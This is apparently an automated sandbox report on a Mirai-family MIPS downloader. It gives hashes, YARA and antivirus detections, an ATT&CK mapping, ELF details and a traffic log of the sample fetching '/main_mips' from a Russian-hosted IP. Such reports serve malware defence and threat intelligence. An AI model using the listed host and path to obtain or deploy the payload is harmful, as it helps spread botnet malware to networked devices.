Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
covid.mips.elf

Overview

General Information

Sample name:covid.mips.elf
Analysis ID:1584856
MD5:422fe87525e3c20d343fc0b66e3b6c9c
SHA1:5537f4647183c34b7d900fefc3d4c9db4d6ceb88
SHA256:2c82dfc2f9157f193902f15182c79d05d7073b84976c9bf4d6f1bfb010c10632
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:72
Range:0 - 100
Whitelisted:false

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
HTTP GET or POST without a user agent
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Yara signature match

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1584856
Start date and time:2025-01-06 16:32:08 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 32s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:covid.mips.elf
Detection:MAL
Classification:mal72.troj.linELF@0/1@0/0
  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
  • VT rate limit hit for: covid.mips.elf
Command:/tmp/covid.mips.elf
PID:5505
Exit Code:5
Exit Code Info:
Killed:False
Standard Output:
Loadinggg
Downloaddd
Standard Error:
  • system is lnxubuntu20
  • covid.mips.elf (PID: 5505, Parent: 5432, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: /tmp/covid.mips.elf
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
dump.pcapLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
  • 0x25f6b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x25f7f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x25f93:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x25fa7:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x25fbb:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x25fcf:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x25fe3:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x25ff7:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x2600b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x2601f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x26033:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x26047:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x2605b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x2606f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x26083:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x26097:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x260ab:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x260bf:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x260d3:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x260e7:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x260fb:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
SourceRuleDescriptionAuthorStrings
/tmp/condi72JoeSecurity_Mirai_8Yara detected MiraiJoe Security
    /tmp/condi72Linux_Trojan_Gafgyt_28a2fe0cunknownunknown
    • 0x226d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x226e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x226fc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x22710:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x22724:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x22738:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x2274c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x22760:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x22774:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x22788:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x2279c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x227b0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x227c4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x227d8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x227ec:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x22800:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x22814:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x22828:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x2283c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x22850:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x22864:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: /tmp/condi72Avira: detection malicious, Label: EXP/ELF.Mirai.Z.A
    Source: covid.mips.elfReversingLabs: Detection: 44%
    Source: global trafficHTTP traffic detected: GET /main_mips HTTP/1.0Data Raw: 00 44 6f 77 6e 6c 6f Data Ascii: Downlo
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: global trafficHTTP traffic detected: GET /main_mips HTTP/1.0Data Raw: 00 44 6f 77 6e 6c 6f Data Ascii: Downlo

    System Summary

    barindex
    Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
    Source: /tmp/condi72, type: DROPPEDMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
    Source: ELF static info symbol of initial sample.symtab present: no
    Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
    Source: /tmp/condi72, type: DROPPEDMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
    Source: classification engineClassification label: mal72.troj.linELF@0/1@0/0
    Source: /tmp/covid.mips.elf (PID: 5505)File written: /tmp/condi72Jump to dropped file
    Source: /tmp/covid.mips.elf (PID: 5505)Queries kernel information via 'uname': Jump to behavior
    Source: covid.mips.elf, 5505.1.000055e6f1b9a000.000055e6f1c21000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/mips
    Source: covid.mips.elf, 5505.1.000055e6f1b9a000.000055e6f1c21000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mips
    Source: covid.mips.elf, 5505.1.00007fff6909c000.00007fff690bd000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mips
    Source: covid.mips.elf, 5505.1.00007fff6909c000.00007fff690bd000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-mips/tmp/covid.mips.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/covid.mips.elf

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: /tmp/condi72, type: DROPPED

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: /tmp/condi72, type: DROPPED
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath InterceptionDirect Volume AccessOS Credential Dumping11
    Security Software Discovery
    Remote ServicesData from Local System1
    Non-Application Layer Protocol
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
    Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
    Ingress Tool Transfer
    Automated ExfiltrationData Encrypted for Impact
    No configs have been found
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Number of created Files
    • Is malicious
    • Internet
    SourceDetectionScannerLabelLink
    covid.mips.elf45%ReversingLabsLinux.Downloader.Mirai
    SourceDetectionScannerLabelLink
    /tmp/condi72100%AviraEXP/ELF.Mirai.Z.A
    No Antivirus matches
    No Antivirus matches
    No contacted domains info
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    185.255.135.104
    unknownRussian Federation
    50113SUPERSERVERSDATACENTERRUfalse
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    185.255.135.104covid.x86.elfGet hashmaliciousMiraiBrowse
    • /main_x86
    byte.mpsl.elfGet hashmaliciousMiraiBrowse
    • /main_mpsl
    No context
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    SUPERSERVERSDATACENTERRUcovid.x86.elfGet hashmaliciousMiraiBrowse
    • 185.255.135.104
    byte.mpsl.elfGet hashmaliciousMiraiBrowse
    • 185.255.135.104
    la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
    • 185.206.2.20
    http://osregist.xyz/tdrig/CNBR.htmlGet hashmaliciousUnknownBrowse
    • 185.255.135.223
    Clienter.dll.dllGet hashmaliciousUnknownBrowse
    • 185.40.4.94
    boatnet.sh4.elfGet hashmaliciousMiraiBrowse
    • 147.78.65.71
    boatnet.spc.elfGet hashmaliciousMiraiBrowse
    • 147.78.65.71
    boatnet.m68k.elfGet hashmaliciousMiraiBrowse
    • 147.78.65.71
    boatnet.arm7.elfGet hashmaliciousMiraiBrowse
    • 147.78.65.71
    boatnet.mips.elfGet hashmaliciousMiraiBrowse
    • 147.78.65.71
    No context
    No context
    Process:/tmp/covid.mips.elf
    File Type:ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, missing section headers at 173624
    Category:dropped
    Size (bytes):166693
    Entropy (8bit):5.053609768635891
    Encrypted:false
    SSDEEP:1536:e3ub1Q736qFzOX+Da37jCdte/mjEhB4rKpBcTNGwBeoTbo4yOBTFQaEcikAMkrjj:e3YQ7VUGPe/VmrsCTNjlTbfoDcmMkYc
    MD5:4E5529A10E0383B18247D58CB4BDDFF2
    SHA1:9B4FB5BC00E1BFB0191F55281E176AADB4FF7B62
    SHA-256:75899FE12E4B622AB0B3F90D955CF4EC5A8778963ACBA3EDC258F28A00436EEE
    SHA-512:D6AB88144D034970AA59DA17D85A563D3A4C5A64AA9D3F532E0608D4E1C6400E56C91A2969D256FF7370D65DCF0E475A1C8ADBC85EF48ABF331D23CC93DE703E
    Malicious:true
    Yara Hits:
    • Rule: JoeSecurity_Mirai_8, Description: Yara detected Mirai, Source: /tmp/condi72, Author: Joe Security
    • Rule: Linux_Trojan_Gafgyt_28a2fe0c, Description: unknown, Source: /tmp/condi72, Author: unknown
    Antivirus:
    • Antivirus: Avira, Detection: 100%
    Reputation:low
    Preview:.ELF.....................@.`...4...0.....4. ...(.............@...@....I...I...............P..FP..FP...S.............dt.Q............................<...'......!'.....................<...'......!...$....'9... ......................<...'..h...!... ....'9 .. ..........................'.. <...'..0...!'..... .....................". .....@................P......Y....... ..$B... ....P...P......Y....... ..$B.....h.....@..$...... ...h..... ..$.I.....$....". ... ............'..(<...'..t...!'............ .......`...`$.I..@..$..$. ........................P......@..$.P.. ........... ..'.. ............'.. .......!........<...'......!...!........'...$......$'..........T...................$..... ..........................<...'......!'............$....$..H. ..$......... !......(!$.... ....8!$........C..................'.. ...H..... ..$...<...'......!'............H..... ..$...<...'......!'.....0...,...(...$... ...............l...!..!0......K. ..0........@.!...l$....p...C...`.........0...,...(
    File type:ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
    Entropy (8bit):4.737095236555721
    TrID:
    • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
    • ELF Executable and Linkable format (generic) (4004/1) 49.84%
    File name:covid.mips.elf
    File size:2'000 bytes
    MD5:422fe87525e3c20d343fc0b66e3b6c9c
    SHA1:5537f4647183c34b7d900fefc3d4c9db4d6ceb88
    SHA256:2c82dfc2f9157f193902f15182c79d05d7073b84976c9bf4d6f1bfb010c10632
    SHA512:31e8defcbe68d35469e4aa81ebe44e3687f4cc915e66bcdffd2ddc12bfa3f392ad9ef7975890f6f8cc8a72a46313b716c8b283e30eedc855311209e36f4ccc18
    SSDEEP:24:3+mkMdb5jl8AmslI3t8AmypR/z2Hx7llPRnYWB4u3GgliI8paLdz3N9l5zBkEp7H:Omr5E4GYg2HnDnheIL/9LuEpjn389aBl
    TLSH:8D41028A1F325EF9F056D53C47370B3A37AA564843C14249E1ACDA401EC030D89EE7E9
    File Content Preview:.ELF.....................@.....4.........4. ...(.............@...@.....0...0...............0.D.0.D.0...T...p........dt.Q........................................0.....,...&... %0...0..... %.........D.%<...'..X...!...\..(!. ..$...<...'..<...!...\..(!. ..$..

    ELF header

    Class:ELF32
    Data:2's complement, big endian
    Version:1 (current)
    Machine:MIPS R3000
    Version Number:0x1
    Type:EXEC (Executable file)
    OS/ABI:UNIX - System V
    ABI Version:0
    Entry Point Address:0x4004c0
    Flags:0x1007
    ELF Header Size:52
    Program Header Offset:52
    Program Header Size:32
    Number of Program Headers:3
    Section Header Offset:1720
    Section Header Size:40
    Number of Section Headers:7
    Header String Table Index:6
    NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
    NULL0x00x00x00x00x0000
    .textPROGBITS0x4000a00xa00x5400x00x6AX0016
    .rodataPROGBITS0x4005e00x5e00x500x10x32AMS004
    .gotPROGBITS0x4406300x6300x540x40x10000003WAp0016
    .bssNOBITS0x4406900x6840x100x00x3WA0016
    .mdebug.abi32PROGBITS0x480x6840x00x00x0001
    .shstrtabSTRTAB0x00x6840x310x00x0001
    TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
    LOAD0x00x4000000x4000000x6300x6305.05160x5R E0x10000.text .rodata
    LOAD0x6300x4406300x4406300x540x702.43340x6RW 0x10000.got .bss
    GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
    TimestampSource PortDest PortSource IPDest IP
    Jan 6, 2025 16:32:53.491424084 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:53.496196985 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:53.496253014 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:53.497143984 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:53.501980066 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.170885086 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.170945883 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.171000004 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.171051025 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.171067953 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.171113014 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:54.171113014 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:54.171113014 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:54.171113014 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:54.171116114 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.171113968 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:54.171164989 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:54.171192884 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.171205044 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.171216011 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.171241999 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:54.171241999 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:54.171241999 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:54.171376944 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.171421051 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:54.175870895 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.175894976 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.175909996 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:54.175929070 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:54.176003933 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.176054955 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:54.176078081 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.176132917 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:54.284883976 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.284903049 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.284929037 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:54.284929037 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:54.285049915 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.285092115 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.285227060 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.285280943 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.285291910 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.285413027 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.285423994 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.285434008 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.285773039 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:54.286120892 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.286221981 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.286281109 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.286290884 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.286384106 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:54.286410093 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.286421061 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.286431074 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.287050009 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:54.287200928 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.287244081 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.287256956 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.287410021 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.287420988 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.287431002 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.287703991 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:54.288144112 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.289767981 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.289779902 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.290250063 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:54.399138927 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.399161100 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.399171114 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.399375916 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.399435043 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.399446011 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.399502039 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.399545908 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.399602890 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.399616003 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.399626017 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:54.399709940 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.399720907 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.399732113 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.400003910 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.400013924 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.400023937 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.400108099 CET8047762185.255.135.104192.168.2.14
